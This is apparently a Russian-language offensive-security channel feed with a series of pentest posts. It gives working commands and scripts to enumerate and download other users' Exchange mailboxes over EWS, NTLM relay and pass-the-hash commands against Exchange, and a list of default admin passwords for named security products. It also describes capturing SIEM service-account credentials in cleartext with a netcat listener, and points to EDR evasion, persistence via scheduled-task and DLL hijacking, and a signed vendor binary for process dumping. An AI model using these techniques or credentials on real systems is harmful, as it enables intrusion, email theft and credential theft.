Всем привет, меня зовут Zer0Way и это перерождение моего очень старого канала.
На канале будут интересные для оффсек вещи. Что-то от меня, а что-то от сообщества.

Первой публикацией я хотел бы поделиться интересной историей про ms exchange.
Пользователи могут управлять разрешениями на доступ к каталогам своей электронной почты.
Это может делать и почтовый администратор.
При получении доступа к одной эл.почте мы можем проверить права доступа к чужим эл.ящикам:
!!!Важно, ваша учетная запись должна иметь доступ по протоколу ews!!!

1) выгрузить список всех адресов из глобальной адресной книги:
например, через MailSniper.ps1 (https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1)

Get-GlobalAddressList -ExchHostname owa.server.com -UserName domain\user -Password password123 -OutFile gal.txt

2) запустить проверку прав доступа через мой скрипт:
https://github.com/feedb/ebussing/blob/main/ge.py
в файлу gal.txt у вас должны находиться адреса эл.почты

python3 ge.py

Будут выводиться записи root, где то будет отображаться дерево как на скриншоте.
Наличие дерева подразумевает доступ вашей учетной записи к каталогам и их содержимому эл.ящика (см.скриншот)
3) находим почты с разрешенным доступом и выгружаем содержимое каталога входящих писем скриптом:
https://github.com/feedb/ebussing/blob/main/download.py
в emails.txt складываем почты в которых есть доступ к inbox/входящие, создаем каталог out
и запускаем

python3 get.py

В каталоге out будут сохраняться eml чужих сообщений
P.s. скрипты написаны на коленке, в новой версии будут параметры и т.д.
P.s.2.через веб морду owa к ящикам доступа не будет, а через api ews доступ возможен. такие вот дела.

Всякие общие почты, обычно почты саппорта и сервисные часто криво делегированы и доступны всем

бортжурнал про обход обнаружения SOCами impacket smbexec.py (очень-очень лайтово) - читать

ews ntlm relay module for ntlmrelayx.py impacket coming soon.....

Сделал модуль авторизации на exchange сервере с зарелеенной учетной записью и автоматическую выгрузку входящих писем в каталог. В этом году выложу, нужно говнокод привести в более менее адекватный вид. P.S. старые инструменты отказались работать с exch, решил сделать как дополнение к ntlmrelayx

первый релиз описанного выше модуля (целиком со всем проектом impacket):
https://github.com/feedb/impacket_ews
Возможно. у кого то найдется время и желание потестировать и закинуть запрос на добавление/улучшение.
запуск:
ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
папки могут быть: inbox, drafts, sentItems, outbox, deletedItems
по дефолту качает inbox

деревенский pass the hash в exchange ews:
- запускаем ntlmrelayx с моим модулем ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
- в другой консоли на том же сервере smbclient.py domain/user@ipсервера -hashes :13B29964CC2480B4EF454C59562E675C

сами к себе вызываем netntlm аутентификацию с хэшем ntlm и перенаправляем на ews.

Готовых инструментов не видел, за неимением инструмента можно поступить таким образом. Есть mimkatz, но нужна винда и т.д.

бортжурнал про обход обнаружения SOCами (и некоторыми Антивирусными решениями) impacket wmiexec.py (очень-очень лайтово) - читать

Видео с демонстрацией к посту)

Как подсказал добрый человек, способ уже давно известен и утилита https://github.com/dafthack/MailSniper умеет в эту историю через ключ OtherUserMailbox

Классная статья по созданию профиля для cobalt strike с обходом детектов: https://whiteknightlabs.com/2023/05/23/unleashing-the-unseen-harnessing-the-power-of-cobalt-strike-profiles-for-edr-evasion/

Староватое уже, но для понимания полезное

Крутая тулза для организации socks через rdp соединение, работает практически без детектов. https://github.com/nccgroup/SocksOverRDP

Обратить внимание на строку:
#define SocksOverRDP_CHANNEL_NAME "SocksChannel"
Ну вы поняли☺️

Интересный способ закрепа в статье https://ipurple.team/2024/01/03/scheduled-task-tampering/ и сама утилита: https://github.com/netero1010/GhostTask

+ а что будет если заменять бинарь? например в таске office automatic updates 2.0?:) или вообще в каталог с бинарем из таски обновления офиса положить свою proxydll с именем msvcp120.dll/msvcp140.dll/msvcr120.dll ?:)

А если изменить в реестре ключ существующей задачи?:)

на пентестах бывают случаи когда компрометация происходит через средства обнаружения атак и средства защиты....далеко не все фильтруют сетевой доступ к компонентам СЗИ.
Так сказать, спасибо за дефолтные пароли:

- rvision soar/deception/etc... ssh root:pxtm0222; postgres rvision:pxtm0222

- maxpatrol VM: Administrator:P@ssw0rd

- maxpatrol siem: Administrator:P@ssw0rd; rabbitmq: siem:P@ssw0rd или mpx_siem:P@ssw0rd

- pt xdr: Administrator:P@ssw0rd

- pt nad: administrator:P0sitive или administrator:Administr@t0r

- security vision soar: postgres postgres:1q2w#E$R; postgres:sv5platform; rabbitmq sv5_user:sv5platform

- kuma (kaspersky siem): admin:mustB3Ch@ng3d!

Докидывайте дефолтные пароли сзи в комментах)

Не реклама, но это очень классные каналы с sans(свежим) и т.д.
https://news.1rj.ru/str/joinchat/WvQZlNhxGF1mNjRk

https://news.1rj.ru/str/+ObUEL3Wz7msyMWZh

У некоторых возникают вопросы, а что даст доступ к определенным средствам защиты в режиме администратора?

начнем с pt vm: как правило, интеграторы и другие вредренцы ленятся тонко настраивать учетные записи в ad для проведения аудитов и дают либо права локального администратора либо вовсе админа домена учетке которую использует сканер. В mp vm есть возможность выполнять powershell команды на аудируемых устройствах, чем собственно вы можете воспользоваться. Создать новую задачу, указать цель, выбрать учетную запись и поехали.

что же касается pt siem: из-за той же самой лени или проблем с руками некоторые дают широкие права учеткам сбора событий. Команды выполнять не получится, пароль учетных записей не посмотреть в веб интерфейсе. Но существует возможность перехватить пароль учетной записи:
- создать новую задачу с профилем Web API Audit
- указать интересующую учетную запись
- ip адрес и порт своего сервера
у себя запустить nc -lvp "порт" и в сиеме запустить задачу. В nc получите креды учетки в открытом виде. С данными кредами у вас намного больше шансов в инфре заказчика. P.S. Это не говоря о паролях в командах и параметрах, если логируют eventid 4688 или 1 (sysmon)

P.s.2. Это не косяки продуктов, это косяки тех кто не меняет пароли и не ограничивает доступ.

Сегодня в одном чате ребята обсуждали написание статьи про Lolbins.
Вот вам один интересный lolbas - C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\kldumper.exe
описание - https://support.kaspersky.ru/common/diagnostics/7641
преза от ЛК, где предлагается сигма правило с исключением данного бинаря из сработки по дампу lsass - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

у kldumper.exe цифровая подпись ЛК. lsass им не дампил еще, но другие процессы дампит ок (при наличии прав лок админа)